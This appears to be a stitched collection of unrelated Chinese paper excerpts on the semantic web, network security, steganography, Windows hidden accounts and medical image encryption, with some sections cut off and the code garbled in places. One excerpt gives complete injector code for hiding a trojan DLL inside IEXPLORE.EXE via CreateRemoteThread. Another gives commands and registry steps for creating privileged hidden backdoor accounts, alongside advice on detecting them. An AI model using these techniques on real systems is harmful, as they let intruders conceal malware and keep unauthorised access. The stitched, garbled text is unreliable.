语义网的基本技术主要包括表示语言(本体开发)、查询语言、转换和推理技术以及相关工具等。其中本体的开发是整个语义网的构建基础,它包括以下一些阶段:确定范围、考虑复用、列举术语、定义分类、定义属性、定义侧面、定义实例和检查异常等。可以充分利用已有的本体或元数据,如都柏林核心元数据(Dublin Core metadata terms)[4]是广为使用的用于资源描述与发现的标准,在利用RDF描述资源时,可以使用其中的一些概念,都柏林核心元数据中典型的概念包括:Title、Creator、Subject等。

从现有知识源(如文本、词典、遗留知识库或本体、数据库模式等)获取领域知识、以(半)自动方式构造或改编本体即所谓的本体学习(ontology learning),是开发本体的有效途径。由河海大学许卓明教授等提出的“从ER模式到OWL DL本体的语义保持的翻译”较好的实现了这一问题,从而使用户可以方便地将ER模式翻译成OWL DL本体[5]。

逻辑推理是语义网的重要内容,根据RDF和RDF Schema建模原语,它所使用的形式语言是谓词逻辑(predicate logic),这通常被认为是所有(基于符号的)知识表示的基础。用逻辑描述RDF和RDFS的语义排除了二义性,并且是机器可读的,同时也为借助逻辑推理机制支持RDF/RDFS的自动推理提供了基础。但是,对于RDF和RDFS而言,它们可以表示某些本体知识,主要建模原主涉及以及类型层次组织起来的词汇,包括子类关系和子属关系、定义域和值域限定以及类实例,然而,还是有很多特性不支持,如属性的局部辖域、类的不相交性、类的布尔组合、基数约束和属性的特殊性质等。为此,在OWL中增加了一些原语以提供更强的表达能力,从而确保OWL的一些子语言(如OWL DL)对应于一个已经得到充分研究的描述逻辑系统。

3基于RDF的学术资源整合模型研究

在对论文资源库进行特点分析后可以发现,论文资源库属于知识库,传统的论文资源基本上有着良好、统一的格式且有着较好的隐藏数据开发潜力,可以在传统数据格式的基础上容易地用XML根据用户自定义的词汇表编写结构化网络文档,再利用RDF编写关于网络对象(论文资源)的简单陈述句,利用OWL语言创作论文资源本体,给出相应的查询和逻辑推理机制,最终将开发出具有新一代网络特征的论文资源语义网络,极大地方便了用户的查询和组织者的管理。

主要任务包括:

1)本体的产生

语义网上存在着各种本体,包括领域本体和全局本体。为了在进行信息检索时有一个较为统一的模式,以便进行语义推理和检索,要求定义全局本体的概念。可以从下几个方面进行定义。

①领域本体:领域本体又称为全局总体,它是对领域知识的明确清晰的表达,通常用本体语言来进行表述。在一些特定的实际应用中,领域本体及领域本体的合成是很有必要的。

②子领域本体:假定领域D能被分成n个子领域,那么领域D的领域本体也可以被分割成n个子领域本体。由于语义网上不同的领域本体通常用各种不同的本体语言来表述,在进行语义网信息检索的时候需要将这些用不同本体语言表述的领域本体转换成统一的形式。转换过程中不可避免地会出现一些信息的丢失,因此,在进行转换的同时,对来自同一个领域的领域本体进行一定的事例,得到新的领域本体。经过转换后的本体就变成了全局本体,也就是用统一的形式表达的各种领域知识集,它能够用更为精确和统一的方式来表达世界的知识集。领域本体转换成全局本体的过程可以通过本体转换工具半自动化地完成。

2)语义推理

推理是指从RDF文档的显式(explicit)知识出发,得到文档中没有显式描述的隐藏(implicit)的知识。在OWL-DL所依赖的描述逻辑中,推理主要分为概念之间的包含推理(subsumption relationship inferences)和实例与类之间的实例推理(instance relationship inferences),可以利用这两种推理在论文资源文档中发现传统搜索搜索不到的隐含信息。在RDFS的推理中,需要在前向链、反向链以及混合方式之间进行选择。前向链将所有数据都交给推理引擎,产生新数据后加入到数据集中;而反向链采用逻辑编程技术,当数据模型接受查询时,将查询翻译成目标,引擎利用反向链规则通过匹配三元组进行目标归结。而混合方式则根据实际情况进行 不同的推理选择。

3)信息检索

与传统的基于SQL的检索方式不同,用户提交的检索形式是语义检索,它有两个目的,一是将用户从具体苛刻的检索关键词中解放出来,用户只需要了解一组与领域词汇相关的本体词条就可以构建成查询语句;第二是可以通过推理查询查询到更加完备的结果。SPARQL[6]查询语言是W3C的推荐标准,它以子图匹配的方式在一组RDF数据集中进行匹配查询。

系统的框架如图1所示。在图1中,用户向系统提交语义查询,系统在已有的语义资源库中进行语义匹配,最终生成查询结果。仍然可以对查询结果进行语义相关性排序,限于篇幅,该文不对此进行研究。

学术资源库主要通过对传统的资源库进行语义转化而得到,这种转换可以是实例的转化,也可以是建立在传统资源库上的虚拟RDF视图[7]。

图1系统结构图

4总结

该文提出一种基于语义Web相关技术的学术资源整合平台模型,它以RDF、OWL本体形式组织学术资源,为用户提供语义查询的结构,通过OWL-DL的内部推理机制,满足用户的推理查询要求,是对传统的查询系统的一种极大的改进。

篇(4)

论文关键词:计算机,网络安全,安全管理,密钥安全技术

当今社会.网络已经成为信息交流便利和开放的代名词.然而伴随计算机与通信技术的迅猛发展.网络攻击与防御技术也在循环递升,原本网络固有的优越性、开放性和互联性变成了信息安全隐患的便利桥梁.网络安全已变成越来越棘手的问题在此.笔者仅谈一些关于网络安全及网络攻击的相关知识和一些常用的安全防范技术。

1网络信息安全的内涵

网络安全从其本质上讲就是网络上的信息安全.指网络系统硬件、软件及其系统中数据的安全。网络信息的传输、存储、处理和使用都要求处于安全状态可见.网络安全至少应包括静态安全和动态安全两种静态安全是指信息在没有传输和处理的状态下信息内容的秘密性、完整性和真实性:动态安全是指信息在传输过程中不被篡改、窃取、遗失和破坏。

2网络信息安全的现状

中国互联网络信息中心(CNNIC)的《第23次中国互联网络发展状况统计报告》。报告显示,截至2008年底,中国网民数达到2.98亿.手机网民数超1亿达1.137亿。

Research艾瑞市场咨询根据公安部公共信息网络安全监察局统计数据显示.2006年中国(大陆)病毒造成的主要危害情况:“浏览器配置被修改”是用户提及率最高的选项.达20.9%.其次病毒造成的影响还表现为“数据受损或丢失”18%.“系统使用受限”16.1%.“密码被盗”13.1%.另外“受到病毒非法远程控制”提及率为6.1%“无影响”的只有4.2%。

3安全防范重在管理

在网络安全中.无论从采用的管理模型,还是技术控制,最重要的还是贯彻始终的安全管理管理是多方面的.有信息的管理、人员的管理、制度的管理、机构的管理等.它的作用也是最关键的.是网络安全防范中的灵魂。

在机构或部门中.各层次人员的责任感.对信息安全的认识、理解和重视程度,都与网络安全息息相关所以信息安全管理至少需要组织中的所有雇员的参与.此外还需要供应商、顾客或股东的参与和信息安全的专家建议在信息系统设计阶段就将安全要求和控制一体化考虑进去.则成本会更低、效率会更高那么做好网络信息安全管理.至少应从下面几个方面人手.再结合本部门的情况制定管理策略和措施:

①树立正确的安全意识.要求每个员工都要清楚自己的职责分工如设立专职的系统管理员.进行定时强化培训.对网络运行情况进行定时检测等。

2)有了明确的职责分工.还要保障制度的贯彻落实.要加强监督检查建立严格的考核制度和奖惩机制是必要的。

③对网络的管理要遵循国家的规章制度.维持网络有条不紊地运行。

④应明确网络信息的分类.按等级采取不同级别的安全保护。

4网络信息系统的安全防御

4.1防火墙技术

根据CNCERT/CC调查显示.在各类网络安全技术使用中.防火墙的使用率最高达到76.5%。防火墙的使用比例较高主要是因为它价格比较便宜.易安装.并可在线升级等特点防火墙是设置在被保护网络和外部网络之间的一道屏障,以防止发生不可预测的、潜在破坏性的侵入。它通过监测、限制、更改跨越防火墙的数据流,尽可能地对外部屏蔽网络内部的信息、结构和运行状况.以此来实现网络的安全保护。

4.2认证技术

认证是防止主动攻击的重要技术.它对开放环境中的各种消息系统的安全有重要作用.认证的主要目的有两个:

①验证信息的发送者是真正的主人

2)验证信息的完整性,保证信息在传送过程中未被窜改、重放或延迟等。

4.3信息加密技术

加密是实现信息存储和传输保密性的一种重要手段信息加密的方法有对称密钥加密和非对称密钥加密.两种方法各有所长.可以结合使用.互补长短。

4.4数字水印技术

信息隐藏主要研究如何将某一机密信息秘密隐藏于另一公开的信息中.然后通过公开信息的传输来传递机密信息对信息隐藏而吉.可能的监测者或非法拦截者则难以从公开信息中判断机密信息是否存在.难以截获机密信息.从而能保证机密信息的安全随着网络技术和信息技术的广泛应用.信息隐藏技术的发展有了更加广阔的应用前景。数字水印是信息隐藏技术的一个重要研究方向.它是通过一定的算法将一些标志性信息直接嵌到多媒体内容中.但不影响原内容的价值和使用.并且不能被人的感觉系统觉察或注意到。

4.5入侵检测技术的应用

篇(5)

关键字进程线程木马动态链接库

木马程序(也称后门程序)是能被控制的运行在远程主机上的程序,由于木马程序是运行在远程主机上,所以进程的隐藏无疑是大家关心的焦点。

本文分析了WindowsNT/2000系统下进程隐藏的基本技术和方法,并着重讨论运用线程嫁接技术如何实现WindowsNT/2000系统中进程的隐藏。

1基本原理

在WIN95/98中,只需要将进程注册为系统服务就能够从进程查看器中隐形,可是这一切在WindowsNT/2000中却完全不同,无论木马从端口、启动文件上如何巧妙地隐藏自己,始终都不能躲过WindowsNT/2000的任务管理器,WindowsNT/2000的任务管理器均能轻松显示出木马进程,难道在WindowsNT/2000下木马真的再也无法隐藏自己的进程了?我们知道,在WINDOWS系统下,可执行文件主要是Exe和Com文件,这两种文件在运行时都有一个共同点,会生成一个独立的进程,寻找特定进程是我们发现木马的方法之一,随着入侵检测软件的不断发展,关联进程和SOCKET已经成为流行的技术,假设一个木马在运行时被检测软件同时查出端口和进程,我们基本上认为这个木马的隐藏已经完全失败。在WindowsNT/2000下正常情况用户进程对于系统管理员来说都是可见的,要想做到木马的进程隐藏,有两个办法,第一是让系统管理员看不见你的进程;第二是不使用进程。本文以第二种方法为例加以讨论,其基本原理是将自已的木马以线程方式嫁接于远程进程之中,远程进程则是合法的用户程序,这样用户管理者看到的只是合法进程,而无法发现木马线程的存在,从而达到隐藏的目的。

2实现方法

为了弄清实现方法,我们必须首先了解Windows系统的另一种"可执行文件"----DLL,DLL是DynamicLinkLibrary(动态链接库)的缩写,DLL文件是Windows的基础,因为所有的API函数都是在DLL中实现的。DLL文件没有程序逻辑,是由多个功能函数构成,它并不能独立运行,一般都是由进程加载并调用的。因为DLL文件不能独立运行,所以在进程列表中并不会出现DLL,假设我们编写了一个木马DLL,并且通过别的进程来运行它,那么无论是入侵检测软件还是进程列表中,都只会出现那个进程而并不会出现木马DLL,如果那个进程是可信进程,(例如浏览器程序IEXPLORE.EXE,没人会怀疑它是木马吧?)那么我们编写的DLL作为那个进程的一部分,也将成为被信赖的一员,也就达到了隐藏的目的。

运行DLL方法有多种,但其中最隐蔽的方法是采用动态嵌入技术,动态嵌入技术指的是将自己的代码嵌入正在运行的进程中的技术。理论上来说,在Windows中的每个进程都有自己的私有内存空间,别的进程是不允许对这个私有空间进行操作的,但是实际上,我们仍然可以利用种种方法进入并操作进程的私有内存。动态嵌入技术有多种如:窗口Hook、挂接API、远程线程等,这里介绍一下远程线程技术,它只要有基本的进线程和动态链接库的知识就可以很轻松地完成动态嵌入。

远程线程技术指的是通过在另一个进程中创建远程线程的方法进入那个进程的内存地址空间。我们知道,在进程中,可以通过CreateThread函数创建线程,被创建的新线程与主线程(就是进程启动时被同时自动建立的那个线程)共享地址空间以及其他的资源。但是很少有人知道,通过CreateRemoteThread也同样可以在另一个进程内创建新线程,被创建的远程线程同样可以共享远程进程(是远程进程)的地址空间,所以,实际上,我们通过一个远程线程,进入了远程进程的内存地址空间,也就拥有了那个远程进程相当的权限。

3实施步骤

1)用Process32Next()函数找到宿主进程,获取宿主进程ID,并用

OpenProcess()函数打开宿主进程。

2)用VirtualAllocEx()函数分配远程进程地址空间中的

内存。

3)用WriteProcessMemory()函数将待隐藏的DLL的路径名。

4)拷贝到步骤二已经分配的内存中。

5)用GetProcAddress()函数获取LoadlibraryA()函数的实地址(在kernel32.dll中)。

6)用CreateRemoteThread()函数在远程进程中创建一个线程。

7)它调用正确的LoadlibraryA()函数。

8)为它传递步骤二中分配的内存地址。

4具体实例

下面是在C++Builder4.0环境下编写的运用远程线程技术隐藏木马的程序代码:

#include<vcl.h>

#include<windows.h>

#include<stdio.h>

#include<tlhelp32.h>//该头文件包涵了进程操作的API函数

#pragmahdrstop

#include"Unit1.h"

#pragmapackage(smart_init)

#pragmaresource"*.dfm"

InsistingpszLibFileName;//存放待隐藏的DLL文件名

HANDLEhProcessSnap=NULL;//进程快照句柄

HANDLEhRemoteProcess;//远程进程句柄

LPVOIDpszLibFileRemote;//远程进程中分配给文件名的空间

HMODULEphmd;//存放kernel32.dll句柄

HANDLEhRemoteThread1=NULL;//存放远程线程句柄

TForm1*Form1;

//---------------------------------------------------------

__fastcallTForm1::TForm1(TComponent*Owner)

:TForm(Owner)

{

}

//---------------------------------------------------------

void__fastcallTForm1::Button1Click(TObject*Sender

{

PROCESSENTRY32pe32={0};

DWORDdwRemoteProcessId;

hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);

//打开进程快照

if(hProcessSnap==(HANDLE)-1)

{

MessageBox(NULL,"CreateToolhelp32Snapshotfailed","",MB_OK);

exit(0);

}//失败返回

pe32.dwSize=sizeof(PROCESSENTRY32);

if(Process32Fi

rst(hProcessSnap,&pe32))//获取第一个进程

{

do{

AnsiStringte;

te=pe32.szExeFile;

if(te.Pos("iexplore.exe")||te.Pos("IEXPLORE.EXE"))

//找到宿主进程,以IEXPLORE.EXE为例

{dwRemoteProcessId=pe32.th32ProcessID;

break;

}

}

while(Process32Next(hProcessSnap,&pe32));//获取下一个进程

}

else

{

MessageBox(NULL,"取第一个进程失败","",MB_OK);

exit(0);

}

hRemoteProcess=OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM

_OPERATION|PROCESS_VM_WRITE,FALSE,dwRemoteProcessId);

//打开远程进程

pszLibFileName=GetCurrentDir()+"\\"+"hide.dll";

//假设hide.dll是待隐藏的进程

intcb=(1+pszLibFileName.Length())*sizeof(char);//计算dll文件名长度

pszLibFileRemote=(PWSTR)VirtualAllocEx(hRemoteProcess,NULL,cb,

MEM_COMMIT,PAGE_READWRITE);

//申请存放文件名的空间

BOOLReturnCode=WriteProcessMemory(hRemoteProcess,

pszLibFileRemote,(LPVOID)pszLibFileName.c_str(),cb,NULL);

//把dll文件名写入申请的空间

phmd=GetModuleHandle("kernel32.dll");

LPTHREAD_START_ROUTINEfnStartAddr=(LPTHREAD_START_ROUTINE)

GetProcAddress(phmd,"LoadLibraryA");

//获取动态链接库函数地址

hRemoteThread1=CreateRemoteThread(hRemoteProcess,NULL,0,

pfnStartAddr,pszLibFileRemote,0,NULL);

//创建远程线

if(hRemoteThread1!=NULL)

CloseHandle(hRemoteThread1);//关闭远程线程

if(hProcessSnap!=NULL)

CloseHandle(hProcessSnap);//关闭进程快照

}

该程序编译后命名为RmtDll.exe,运行时点击界面上的按钮即可。

至此,远程嵌入顺利完成,为了试验我们的hide.dll是不是已经正常地在远程线程运行,我同样在C++Builder4.0环境下编写并编译了下面的hide.dll作为测试:

nclude<vcl.h>

#include<windows.h>

#pragmahdrstop

#pragmaargsused

BOOLWINAPIDllEntryPoint(HINSTANCEhinst,unsignedlongreason,void*lpReserved)

{

charszProcessId[64];

switch(reason)

{

caseDLL_PROCESS_ATTACH:

{//获取当前进程ID

itoa(GetCurrentProcessId(),szProcessId,10);

MessageBox(NULL,szProcessId,"RemoteDLL",MB_OK);

break;

}

default:

}

returnTRUE;

}

当使用RmtDll.exe程序将这个hide.dll嵌入IEXPLORE.EXE进程后假设PID=1208),该测试DLL弹出了1208字样的确认框,同时使用PS工具

也能看到:

ProcessID:1208

C:\WINNT\IEXPLORE.EXE(0x00400000)

……

C:\WINNT\hide.dll(0x100000000)

……

这证明hide.dll已经在IEXPLORE.EXE进程内正确地运行了。上面程序的头文件由编译器自动生成,未作改动,故略之。

5结束语

进程隐藏技术和方法有很多,而且这一技术发展也相当快,本文仅从一个侧面加以讨论,希望通过这一探讨让我们对进程隐藏技术有一个更清楚的认识,同时也为我们防范他人利用进程隐藏手段非法入侵提供参考,本文抛砖引玉,不当之处诚恳批评指正。

篇(6)

【 中图分类号 】 TN915.08 【 文献标识码 】 A

【 Abstract 】 This paper presents a kind of information hiding technology, first of all, through using DES encryption algorithm to encrypt files, and then through information hiding, encrypted file hidden in the BMP image, the encryption image is exactly the same with the original image, the protection of the data is implemented very well.

【 Keywords 】 information hiding; des; encryption image

1 引言

信息隐藏是上世纪90年代开始兴起的信息安全新技术,并成为信息安全技术研究的热点。传统通信领域为了保证传递的信息能够不被窃听或破坏,常采用密码来保护信息,即让窃听者无法看到或听懂,但是这种技术的缺点是告诉窃听者这就是秘密信息,特别是随着计算机技术的发展,密码的安全性受到很大挑战。而新的信息隐藏技术是将需要传递的秘密信息,隐藏在一个普通的非秘密消息当中,再进行传输,这样即使窃听者窃听了传输的信息,也只会将其当成普通的消息,而不会怀疑或者无法得知是否有秘密信息的存在。

BMP是目前最常见的一种图像格式,采用BMP图像作为隐藏消息的载体具有许多优点。首先,BMP图像格式是互联网上图像传输的事实标准,使用这一图像格式比起其它格式来更不会引起怀疑。其次,BMP压缩造成的和秘密消息嵌入带来的图像质量退化是肉眼很难分辨的。为了更好地保证信息的安全性,本文把文件密码加密和信息隐藏这两种技术结合起来:首先利用DES(Data Encryption Standard)把信息文件进行加密,然后把加密后的文件通过选定的BMP图像以特定算法进行隐藏。

2 信息隐藏算法

信息隐藏把前面的加密信息隐藏在无关紧要的载体BMP图片中,第三方并不知道秘密通信这个事实的存在,也就是将秘密信息本身的存在藏起来,即使得到了载密对象,也看不到存在的秘密信息。

隐藏算法通过对BMP图像中选定的DCT系数进行微小变换,以满足特定的关系来表示一个比特的信息。在提取隐藏的信息时,根据隐藏的逆过程抽取比特信息。其特点是隐藏的数据量较少,但是其抵抗几何变换等攻击的能力较强。

在BMP编码中,量化过程是多对一的映射,它是有损变换过程,如果在量化前嵌入秘密消息,会丢失一些信息,从而导致解码时不能正确的获得秘密信息。因此,BMP图像的隐写算法的基本原理必须在量化后进行。由前所述,人眼对亮度信号比对色差信号更敏感,因此本工作将秘密消息与量化后的Y分量的DCT系数的LSB联系起来,从而达到嵌入和提取秘密信息的目的。

隐藏流程如图1所示,具体分为三步骤。

(1)对BMP图像的压缩数据进行解码,得到量化后的DCT系数。

(2)按照隐写算法的嵌入规则对Y分量的DCT系数进行修改,将要隐藏的秘密消息嵌入到其中。

① 首先对载体图像按照8×8的分块方式进行分块。如果载体图像的行数和列数的像素个数不为8的倍数时,则要进行边界扩充处理,使得行数和列数的像素个数都是8的倍数。设载体图像的行数为ImgHeight,列数为ImgWidth,Y在行和列方向上的采样率分别为SampRate_Y_H和SampRate_Y_V,则整幅图像被分为MCUNum = ImgWidth * ImgHeight / (64 * SampRate_Y_H * SampRate_Y_V)个小块。

② 读入待隐信息文件,把其转换为二进制的位流。设待隐信息文件的长度为FileLength。为了以后提取待隐信息,需要传递文件长度,用2个字节表示,可表示的最大数为65535。这样总的需要隐藏的信息长度 TotalFileLength = FileLength + 2,单位是字节。

③ 对一个MCU,按照对Y分量的DCT系数最低位进行修改。查找预定义的矩阵MIDBAND,该矩阵由数值0,1组成,对其中数值为1的位置修改对应DCT的频率系数:如果当前待隐信息的二进制值为0,则把相应位置的频率系数值的最低为修改为0;如果当前待隐信息的二进制值为1,则把相应位置的频率系数值的最低为修改为1。

④ 对待隐信息文件的二进制流按照③的隐藏方案进行信息隐藏。如果待隐信息文件长度大于载体图片的最大隐藏量,则把待隐信息文件按照最大隐藏量进行分段,然后分批按照隐藏流程处理。

(3)对修改后的DCT系数进行编码,重新生成压缩数据,即载密BMP图像。对于上面分批隐藏的,生成系列载密图像如图2所示。

秘密消息的提取过程是嵌入过程的逆过程,提取算法要和隐写算法相对应。

3 结束语

在网络飞速发展的今天,信息隐藏技术的研究具有现实意义。本文将DES加密技术与信息隐藏技术相融合,将加密后的信息隐藏到最常见的BMP图片中,使整个信息隐藏过程达到比较高的安全级别。信息隐藏技术在商业中的广泛应用,是一个跨多领域、多学科(数字信号处理、图像处理、模式识别、数字通信、多媒体技术、密码学、语音处理等)的技术体系,由于它与具体的应用密切相关,这也决定了信息隐藏技术研究成果的多样性以及信息隐藏技术研究的不完善性,仍有许多技术问题需要解决。但可以相信,随着科学技术越来越发达,信息隐藏将有更加广阔的发展空间。

参考文献

[1] 夏煜,郎荣玲,曹卫兵等.基于图像的信息隐藏检测算法和实现技术研究综述[J].计算机研究与发展,2004, 41(4):728-736.

[2] 陈波,谭运猛,吴世忠.信息隐藏技术综述[J].计算机与数字工程, 2005, 33(2):21-23.

[3] 陈雅.基于数字图像的信息隐藏技术综述[J].福建电脑,2008, (2):6-6.

篇(7)

 

用户帐户是指用户定义到Windows的所有信息组成的记录。这些记录包括用户名和用户登录所需的密码、用户帐户所属组,以及用户使用计算机和网络并访问资源的权利和权限。通常管理用户的方式是使用Windows自带的帐户管理工具,例如netuser命令、计算机管理中的本地用户和组等,但是由于这些工具自身存在的缺陷,在使用这些工具的过程中,部分用户账号并没有显示出来,这些帐户也就是通常所说的“隐藏账户”,有时也叫“影子帐户”。

一、隐藏账户的种类。

在windows中的隐藏帐户分为以下几种,下面就来看看这些帐户的本来面目。

1、最简单的隐藏帐户

最简单的隐藏帐户可以在CMD模式下通过命令创建。点击“开始”→“运行”,输入“CMD”后回车,进入到CMD模式。下面使用“net user”命令来创建帐户,命令格式为“net user 帐户名称 账户密码 /add”,输入“net user test$ 123456/add”,回车,成功后会显示“命令成功完成”。

再使用“net user”命令查看当前系统中的帐户信息列表,发现并没有刚才创建的“test$”帐户。那么刚才创建的账户是否真的已经存在了呢?让我们点击“开始”→“运行”,输入“compmgmt.msc”后回车,进入到“计算机管理”,查看其中的“本地用户和组”,在“用户”一项中,发现刚才建立的账户“test$”是存在的(如下图)。

这说明刚才创建的“test$”确实是一个在CMD模式中不能用“net user”命令查看的隐藏帐户。

从上面的过程看,“test$”账户之所以被隐藏,是因为它的用户名有“$”后缀,这是windows自身的一种隐藏机制,而且这种通过特殊后缀名创建的账户只能在CMD中相对于使用“netuser”命令查看时进行隐藏,而对于通过“本地用户和组”查看用户信息则必然“显形”。其实,由于创建账户时默认为将用户加入到“users”组,在CMD模式中可以直接通过查看“users”组来让其“显形”,即在“命令提示符”后输入“netlocalgroup users”就会列出刚才创建的“test$”。并且这种隐藏账户会在用户切换或系统重启时自动“显形”在windows的登录界面中。因此这种隐藏账户的方法是一种初级的隐藏方法,只对那些粗心的管理员有效,是一种入门级的系统账户隐藏技术。

2、注册表型隐藏帐户

上面创建的隐藏账户很容易“显形”,下面通过注册表建立一种在CMD模式和“本地用户和组”中“隐形”的账户。,注册表。

我们都知道,创建的所有账户信息都会记录在注册表中。点击“开始”→“运行”,输入“regedit”后回车,进入到“注册表编辑器”,来到注册表编辑器的“HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNames”处,当前系统中所有存在的账户都会在这里显示,当然包括我们的隐藏账户(若发现SAM不能展开,则“HKEY_LOCAL_MACHINESAMSAM”处右击选择“权限”,在弹出的“SAM的权限”编辑窗口中选中“administrators”账户,在下方的权限设置处勾选“完全控制”,完成后点击“确定”即可。然后我们切换回“注册表编辑器”,可以发现“HKEY_LOCAL_MACHINESAMSAM”下面的键值都可以展开了)。点击上面创建的隐藏账户“test$”,可以看到右边的窗格中对应的类型显示为“0x3ec”,在左边“Names”的上级结点“Users”下可以看到对应的“000003EC”,以上内容可能在实验中的显示标识有所不同。

将“test$”的键值导出为test$.reg,同时将“000003EC”导出为test$Value.reg。接下来进入CMD模式,在“命令提示符”后输入“net user test$ /del”将上面建立的隐藏账户删除。最后,将“test$.reg”和“test$Value.reg”导入注册表,至此,注册表型隐藏账户制作完成。,注册表。从这种创建账户的方式中可以看出,每一个账户的关键信息保存在注册表的“Users”的相关结点键值中,可以进一步地通过复制“administrator”的键值来提升隐藏账户的权限。这种创建隐藏用户的方法也可以使用“HideAdmin”这个软件非常容易地完成。

二、“狙击”隐藏账户。

如果入侵者在你的系统中创建这样一些隐藏账户,无疑会给你的系统安全带来极大的危害,下面就采用循序渐进的方式将其“扫地出门”。

1、如果是第一种最简单的隐藏账户,则直接在“在地用户和组”中将其删除即可,只是注意在检查账户列表时不能仅仅依靠CMD模式下的“net user”命令。

2、对于注册表型隐藏账户,在系统重启或进行账户的增删操作后会在“本地用户和组”中“显形”出来。那么是不是就可以像第一种一样直接删除呢?答案是否定的。,注册表。直接删除不能成功执行,那么就只好到注册表中去删除相应的结点项了。

3、如果入侵者创建了一个注册表型隐藏账户,并在此基础上删除了管理员对注册表的操作权限。那么管理员是无法通过注册表删除隐藏账户的,甚至无法知道隐藏账户名称。那我们就只好借助“组策略”的帮助,让黑客无法通过隐藏账户登陆。点击“开始”→“运行”,输入“gpedit.msc”运行“组策略”,依次展开至“审核策略”,双击右边的“审核策略更改”,在弹出的设置窗口中勾选“成功”,然后点“确定”。对“审核登陆事件”和“审核过程追踪”进行相同的设置。这样我们就可以通过“事件查看器”准确得知隐藏账户的名称和登陆的时间。即使入侵者将所有的登陆日志删除,系统还会记录是哪个账户删除了系统日志,这样入侵者的隐藏账户就暴露无疑了。在得知隐藏账户的名称后即使不能删除这个隐藏账户,我们也可以修改其密码让其不能登录,这样该隐藏账户就形同虚设了。,注册表。

三、防范隐藏账户。,注册表。

与其在隐藏账户存在后进行“狙击”,不如事先采用适当的策略,将隐藏账户拒之门外,防患于未然。,注册表。

1、从管理层次上看,应该做好以下工作:

(1)管理员账户在采用强口令的基础上,除完成必要的管理任务外,不得进行日常操作;

(2)账户的增加和删除应该采用登记机制;

(3)账户权限应该采用“最小化”原则,避免越权操作;

(4)管理员应该定期和不定期地对账户列表进行检查,发现非法账户应及时进行处理;

(5)建立必要的账户恢复和应急策略。

2、从技术层次上看,应该做好以下几点:

(1)使用“组策略”配置账户管理;

(2)关闭远程注册表修改服务;

(3)采用多种方式检查用户账户列表;

(4)充分利用事件查看器中的审核信息进行防范。

从以上的分析可以看出,所谓的隐藏账户并不能达到真正的“无形”,只要你理解了windows账户的本质,掌握了一定的安全管理技术,具备良好的安全防范意识,隐藏账户式的攻击就会在你的面前知难而退。

参考文献:

[1]张月红:《网络安全与技术》,湖北长江出版社

篇(8)

基本思想是通过混沌系统运算出一个混沌序列,将这个序列按照事先选取的既定的算法或是排列方案进而进一步进行运算以生成新的一个序列。与此同时,为了保证原混沌序列的位置与计算后的新序列之间的变换位置是一一对应的,又进一步利用了混沌系统的遍历性。实验表明,这种通过由混沌系统得出的混沌序列的进而对其进一步运算得到的变化关系在应用到图像置乱后可以实现明显的图像置乱效果。同时为了改变加密图像的统计特性、图像像素值以及降低图像像素值间的相关性,也可以通过单个混沌序列或多个复合的混沌序列来实现改变。数字图像信息隐藏数字图像信息隐藏技术也可用于保护病人医学影像的隐私。基本思想是,将需要被加密的医学图像的数字信息隐藏在另外一幅无关的图像中,比如一幅公开图像。这幅图像要求具有一定的迷惑性、大众性,以便迷惑攻击者,能够降低转移其注意力,这样就降低了图像被攻击的几率;与此同时,通过一定算法改变加密图像的原有的统计特性。以达到保护被加密影像的目的。应用其中的调配融合算法、“中国拼图”算法可以使图像的信息隐藏达到一个高质量的水平。另外,还可以综合各种不同的算法的特点,将数字隐藏技术扩展到声音、图像等不同的信息载体中的信息隐藏需求中去。另外,近年来新兴的一种数字作品版权保护技术——数字图像水印技术[3],能够有效地保护作者以及出版商的合法权益不受侵犯,现已被广泛应用于印刷领域中,具有了广阔的使用价值和商用价值,成为多媒体及知识产权保护的有效手段之一。数字图像水印技术是信息隐藏技术研究领域的一个重要分支。为了显示创作者对其作品的所有权,这种隐藏技术将具有某种意义的数字水印利用数字嵌入方法将其隐藏在其作品(可以是多种信息载体,比如视频、图像、声音、文字等数字产品)中。在进行印刷品真伪验证时,可通过水印的检测、分析来保证数字信息的完整性及可靠性。数字图像分存数字图像分存技术是把一幅需要进行保护的数字图像分割成多幅图像进行传输。被分割后的图像不再具有某种特殊的意义成为无意义或是看起来杂乱无章的图像。也可将分割后图像进一步隐藏到另外几幅不相关的或是具有一定迷惑作用的图像中进行存储获传输。这类似于数据组的分包传输。这样可以避免因个别图像的传输丢失而造成病人隐私信息遭到泄露的危险,而且也起到在通信中个别被分割后的图像信息的丢失与泄露不会影响原始图像信息的泄露。数字图像分存技术的特点使窃密者窃取完整的原始图像的成本大大增加,而且也提高了病人图像隐私的保密程度同时,若将图像置乱技术、图像隐藏技术、图像分存技术三者结合起来将使图像的安全传输有了较高的可靠性。

对病人实行连续诊断,及时获取病情发展状况成为未来要实现的目标;同时,病人的隐私在图像传输过程中也增加了泄露和被攻击的风险,因此,在某种特定情况下对病人图像信息的传输需要进行加密保护。实现这一目标的关键技术就是安全性高、保密性强、延时短的图像加密通信系统。图像加密通信系统对病人的病情进行实时监护,并将病人的信息实时传回到医生的监控中心,使医生能够通过监控屏幕实时查看了解病人的具体情况,以能够及时做出正确的医疗诊断。目前数字图像的特点决定了其在存储传输时必定要占用较大的空间与带宽,再加上其需要处理的信息量大,这就进一步给图像的加密和通信带来了困难。而远程医疗更需要清楚的观测到病人的详细病情,就进一步加大了保密通信的难度。因此需要将图像压缩以及图像加密两个技术结合起来对数字图像的传输进行处理。图像加密是为了保证数字图像的安全,图像的压缩技术可以最大限度的减小占用的存储空间以便降低传输数据量。根据对原始图像进行压缩及加密处理过程不同,可将现有的数字图像加密通信分为三类。图像直接加密将数字图像直接加密一般是通过数字图像置乱技术直接对需要加密的数字图像进行置乱,随后再进行压缩编码和通信传输。这个方面的研究较早,相关论文也最多。例如,基于混沌的数据块加密算法将图像或视频数据先进行位置置乱,再进行像素值扩散,此算法具有较高的密钥敏感性和明文敏感性,使得加密后的数据具有均匀随机分布的特点。但是,这类方案只看重了图像的加密,没有将图像的压缩编码问题放在同样重要的位置上考虑。这样就随之而然的出现了两个严重影响通信效率及解密后的图像清晰度的问题。一是,需要加密的原始视频图像本身的数据占用空间就大,其进一步的加密计算便会消耗大量的资源与时间,这与实时性的要求有悖,况且目前的设备处理能力有限更难以达到图像传输的实时性要求,加重了通信的负担;二是,由于经过加密算法处理,使图像原来的相邻像素间的相关性有了变化,大量的增加了高频分量。使加密压缩后的视频图像的高频分量比低频分量的失真大得多,因此解密后的图像会有较大的失真。

